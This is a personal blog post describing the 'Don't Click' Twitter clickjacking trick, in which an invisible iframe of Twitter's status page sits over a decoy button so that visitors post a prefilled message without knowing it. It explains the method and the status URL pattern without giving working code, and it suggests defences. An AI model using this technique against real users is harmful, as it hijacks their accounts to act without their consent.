Tag ‘black hat’ » Archiv

6

Why did I just click this link? I got twitter-jacked!

February
12

your tweets or your life!
haha, I saw something quite cool and possibly scary today.

One of the people I follow had a tiny url with message “don’t click” so, of course, I clicked it and was presented with a blank page containing one button. Of course, I clicked that button too but nothing happened… until I saw people replying to me saying “no I didn’t” , turns out that when I clicked the button, I was actually sending the link to my own public timeline!! how? well, some french guy made a post about how to automatically send a tweet acting as the person who clicks a button by using an iframe and some simple css. I don’t know if he was the first twitter jacker but I’m sure he wont be the last!

It’s something that is spreading around twitter. As I type this, “Don’t Click” is a trending topic on twitter search…

The click of the button labeled “don’t click this” was actually the button of Twitter’s home page. You can’t see the rest of the page but when you click (well, most people would!), you are actually clicking on the update button for twitter.

The message is added by urlencoding a message on to the end of the twitter home page, thusly;
http://twitter.com/home?status=
and the urlencoded (changes spaces and other special characters to their hex equivalent) goes after…
I+luv+the+commentluv+plugin%21

As long as you’re logged in to twitter, clicking this link will show a message of my choosing in your own update field. If I used html to insert an iframe into a page with a button I made. All I would have to do is set the opacity of the iframe to 0 and position it so the update button is (invisibly) over the button I put on the page. (don’t worry, I didn’t do any shenanigans with the link above).

I did a quick bash up of some html (lol, no javascript needed) to see if I could do it and, well, it’s a piece of piss really. I decided not to show it to you as a working example because I am pretty sure that the Twitter T.o.S. doesn’t like anything to do with posting on someones behalf by misleading them. (impersonation violation?)

You can read some ways to prevent this from being used against you on this rather fine post.

Another way to detect it, is to have a script that faintly outlines any iframes on the page so you can see if there’s a doin’s goin’ on! I think I smell tomorrow’s project! :-)

(either that or petition Twitter to have frame breaking script on any page that a user has text input and update buttons on).

Blog News